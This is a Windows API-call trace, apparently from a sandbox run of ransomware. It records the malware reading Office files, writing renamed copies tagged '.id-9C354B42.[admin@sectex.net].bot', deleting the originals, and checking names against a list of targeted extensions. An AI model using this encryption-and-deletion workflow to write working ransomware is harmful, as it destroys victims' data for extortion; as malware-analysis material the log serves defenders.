	[0162.704] ReadFile (in: hFile=0x1b4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x30d, lpOverlapped=0x0) returned 1
	[0162.706] WriteFile (in: hFile=0x1d8, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x310, lpOverlapped=0x0) returned 1
	[0162.707] ReadFile (in: hFile=0x1b4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.707] WriteFile (in: hFile=0x1d8, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0162.707] SetEndOfFile (hFile=0x1d8) returned 1
	[0162.707] CloseHandle (hObject=0x1d8) returned 1
	[0162.707] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.707] SetEndOfFile (hFile=0x1b4) returned 1
	[0162.711] CloseHandle (hObject=0x1b4) returned 1
	[0162.712] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORT.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.712] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\report.cfg")) returned 1
	[0162.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORT.CFG") returned 64
	[0162.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORT.CFG") returned 64
	[0162.712] lstrlenW (lpString=".doc") returned 4
	[0162.712] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0162.712] lstrlenW (lpString=".docx") returned 5
	[0162.713] lstrcmpiW (lpString1=".docx", lpString2="T.CFG") returned -1
	[0162.713] lstrlenW (lpString=".pdf") returned 4
	[0162.713] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0162.713] lstrlenW (lpString=".xls") returned 4
	[0162.713] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0162.713] lstrlenW (lpString=".xlsx") returned 5
	[0162.713] lstrcmpiW (lpString1=".xlsx", lpString2="T.CFG") returned -1
	[0162.713] lstrlenW (lpString=".ppt") returned 4
	[0162.713] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0162.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORT.CFG") returned 64
	[0162.713] lstrlenW (lpString=".zip") returned 4
	[0162.713] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0162.713] lstrlenW (lpString=".rar") returned 4
	[0162.713] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0162.713] lstrlenW (lpString=".bz2") returned 4
	[0162.713] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0162.713] lstrlenW (lpString=".7z") returned 3
	[0162.713] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0162.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORT.CFG") returned 64
	[0162.713] lstrlenW (lpString=".dbf") returned 4
	[0162.713] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0162.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORT.CFG") returned 64
	[0162.713] lstrlenW (lpString=".1cd") returned 4
	[0162.713] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0162.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORT.CFG") returned 64
	[0162.713] lstrlenW (lpString=".jpg") returned 4
	[0162.713] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0162.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORT.CFG") returned 64
	[0162.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORT.CFG") returned 64
	[0162.713] lstrlenW (lpString=".doc") returned 4
	[0162.714] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0162.714] lstrlenW (lpString=".docx") returned 5
	[0162.714] lstrcmpiW (lpString1=".docx", lpString2="T.CFG") returned -1
	[0162.714] lstrlenW (lpString=".pdf") returned 4
	[0162.714] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0162.714] lstrlenW (lpString=".xls") returned 4
	[0162.714] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0162.714] lstrlenW (lpString=".xlsx") returned 5
	[0162.714] lstrcmpiW (lpString1=".xlsx", lpString2="T.CFG") returned -1
	[0162.714] lstrlenW (lpString=".ppt") returned 4
	[0162.714] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0162.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORT.CFG") returned 64
	[0162.714] lstrlenW (lpString=".zip") returned 4
	[0162.714] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0162.714] lstrlenW (lpString=".rar") returned 4
	[0162.714] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0162.714] lstrlenW (lpString=".bz2") returned 4
	[0162.714] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0162.714] lstrlenW (lpString=".7z") returned 3
	[0162.714] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0162.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORT.CFG") returned 64
	[0162.714] lstrlenW (lpString=".dbf") returned 4
	[0162.714] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0162.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORT.CFG") returned 64
	[0162.714] lstrlenW (lpString=".1cd") returned 4
	[0162.714] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0162.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORT.CFG") returned 64
	[0162.714] lstrlenW (lpString=".jpg") returned 4
	[0162.714] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0162.715] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0162.715] lstrlenW (lpString="REPORTL.ICO") returned 11
	[0162.715] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\reportl.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0162.715] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=1078) returned 1
	[0162.715] CloseHandle (hObject=0x1b4) returned 1
	[0162.715] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\reportl.ico")) returned 0x20
	[0162.716] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\reportl.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.716] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\reportl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0162.716] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.716] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.716] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\reportl.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0162.717] GetLastError () returned 0x0
	[0162.717] ReadFile (in: hFile=0x1b4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x436, lpOverlapped=0x0) returned 1
	[0162.718] WriteFile (in: hFile=0x1d8, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x440, lpOverlapped=0x0) returned 1
	[0162.719] ReadFile (in: hFile=0x1b4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.719] WriteFile (in: hFile=0x1d8, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0162.719] SetEndOfFile (hFile=0x1d8) returned 1
	[0162.719] CloseHandle (hObject=0x1d8) returned 1
	[0162.720] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.720] SetEndOfFile (hFile=0x1b4) returned 1
	[0162.722] CloseHandle (hObject=0x1b4) returned 1
	[0162.722] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.722] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\reportl.ico")) returned 1
	[0162.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTL.ICO") returned 65
	[0162.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTL.ICO") returned 65
	[0162.723] lstrlenW (lpString=".doc") returned 4
	[0162.723] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0162.723] lstrlenW (lpString=".docx") returned 5
	[0162.723] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0162.723] lstrlenW (lpString=".pdf") returned 4
	[0162.723] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0162.723] lstrlenW (lpString=".xls") returned 4
	[0162.723] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0162.723] lstrlenW (lpString=".xlsx") returned 5
	[0162.723] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0162.723] lstrlenW (lpString=".ppt") returned 4
	[0162.723] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0162.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTL.ICO") returned 65
	[0162.723] lstrlenW (lpString=".zip") returned 4
	[0162.723] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0162.723] lstrlenW (lpString=".rar") returned 4
	[0162.723] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0162.723] lstrlenW (lpString=".bz2") returned 4
	[0162.723] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0162.723] lstrlenW (lpString=".7z") returned 3
	[0162.723] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0162.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTL.ICO") returned 65
	[0162.723] lstrlenW (lpString=".dbf") returned 4
	[0162.723] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0162.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTL.ICO") returned 65
	[0162.723] lstrlenW (lpString=".1cd") returned 4
	[0162.723] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0162.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTL.ICO") returned 65
	[0162.723] lstrlenW (lpString=".jpg") returned 4
	[0162.723] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0162.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTL.ICO") returned 65
	[0162.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTL.ICO") returned 65
	[0162.724] lstrlenW (lpString=".doc") returned 4
	[0162.724] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0162.724] lstrlenW (lpString=".docx") returned 5
	[0162.724] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0162.724] lstrlenW (lpString=".pdf") returned 4
	[0162.724] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0162.724] lstrlenW (lpString=".xls") returned 4
	[0162.724] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0162.724] lstrlenW (lpString=".xlsx") returned 5
	[0162.724] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0162.724] lstrlenW (lpString=".ppt") returned 4
	[0162.724] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0162.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTL.ICO") returned 65
	[0162.724] lstrlenW (lpString=".zip") returned 4
	[0162.724] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0162.724] lstrlenW (lpString=".rar") returned 4
	[0162.724] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0162.724] lstrlenW (lpString=".bz2") returned 4
	[0162.724] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0162.724] lstrlenW (lpString=".7z") returned 3
	[0162.724] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0162.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTL.ICO") returned 65
	[0162.724] lstrlenW (lpString=".dbf") returned 4
	[0162.724] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0162.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTL.ICO") returned 65
	[0162.724] lstrlenW (lpString=".1cd") returned 4
	[0162.724] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0162.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTL.ICO") returned 65
	[0162.724] lstrlenW (lpString=".jpg") returned 4
	[0162.724] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0162.725] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0162.725] lstrlenW (lpString="REPORTS.ICO") returned 11
	[0162.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\reports.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0162.863] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=2998) returned 1
	[0162.863] CloseHandle (hObject=0x1d8) returned 1
	[0162.876] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\reports.ico")) returned 0x20
	[0162.883] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\reports.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.155] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\reports.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0163.156] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.156] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.156] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\reports.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0163.694] GetLastError () returned 0x0
	[0163.694] ReadFile (in: hFile=0x1b4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0163.696] WriteFile (in: hFile=0x268, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0163.697] ReadFile (in: hFile=0x1b4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.697] WriteFile (in: hFile=0x268, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0163.697] SetEndOfFile (hFile=0x268) returned 1
	[0163.697] CloseHandle (hObject=0x268) returned 1
	[0163.697] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.697] SetEndOfFile (hFile=0x1b4) returned 1
	[0163.699] CloseHandle (hObject=0x1b4) returned 1
	[0163.699] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.700] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\reports.ico")) returned 1
	[0163.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTS.ICO") returned 65
	[0163.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTS.ICO") returned 65
	[0163.700] lstrlenW (lpString=".doc") returned 4
	[0163.700] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0163.700] lstrlenW (lpString=".docx") returned 5
	[0163.700] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0163.700] lstrlenW (lpString=".pdf") returned 4
	[0163.700] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0163.701] lstrlenW (lpString=".xls") returned 4
	[0163.701] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0163.701] lstrlenW (lpString=".xlsx") returned 5
	[0163.701] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0163.701] lstrlenW (lpString=".ppt") returned 4
	[0163.701] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0163.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTS.ICO") returned 65
	[0163.701] lstrlenW (lpString=".zip") returned 4
	[0163.701] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0163.701] lstrlenW (lpString=".rar") returned 4
	[0163.701] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0163.701] lstrlenW (lpString=".bz2") returned 4
	[0163.701] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0163.701] lstrlenW (lpString=".7z") returned 3
	[0163.701] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0163.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTS.ICO") returned 65
	[0163.701] lstrlenW (lpString=".dbf") returned 4
	[0163.701] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0163.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTS.ICO") returned 65
	[0163.701] lstrlenW (lpString=".1cd") returned 4
	[0163.701] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0163.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTS.ICO") returned 65
	[0163.701] lstrlenW (lpString=".jpg") returned 4
	[0163.701] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0163.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTS.ICO") returned 65
	[0163.701] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTS.ICO") returned 65
	[0163.701] lstrlenW (lpString=".doc") returned 4
	[0163.701] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0163.701] lstrlenW (lpString=".docx") returned 5
	[0163.701] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0163.701] lstrlenW (lpString=".pdf") returned 4
	[0163.701] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0163.701] lstrlenW (lpString=".xls") returned 4
	[0163.702] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0163.702] lstrlenW (lpString=".xlsx") returned 5
	[0163.702] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0163.702] lstrlenW (lpString=".ppt") returned 4
	[0163.702] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0163.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTS.ICO") returned 65
	[0163.702] lstrlenW (lpString=".zip") returned 4
	[0163.702] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0163.702] lstrlenW (lpString=".rar") returned 4
	[0163.702] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0163.702] lstrlenW (lpString=".bz2") returned 4
	[0163.702] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0163.702] lstrlenW (lpString=".7z") returned 3
	[0163.702] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0163.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTS.ICO") returned 65
	[0163.702] lstrlenW (lpString=".dbf") returned 4
	[0163.702] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0163.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTS.ICO") returned 65
	[0163.702] lstrlenW (lpString=".1cd") returned 4
	[0163.702] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0163.702] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\REPORTS.ICO") returned 65
	[0163.702] lstrlenW (lpString=".jpg") returned 4
	[0163.702] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0163.702] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0163.702] lstrlenW (lpString="RSSITEML.ICO") returned 12
	[0163.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEML.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rssiteml.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0163.703] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=1078) returned 1
	[0163.703] CloseHandle (hObject=0x1b4) returned 1
	[0163.703] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEML.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rssiteml.ico")) returned 0x20
	[0163.703] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEML.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rssiteml.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEML.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rssiteml.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0163.703] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.703] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.704] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\RSSITEML.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\rssiteml.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0163.704] GetLastError () returned 0x0
	[0163.704] ReadFile (in: hFile=0x1b4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x436, lpOverlapped=0x0) returned 1
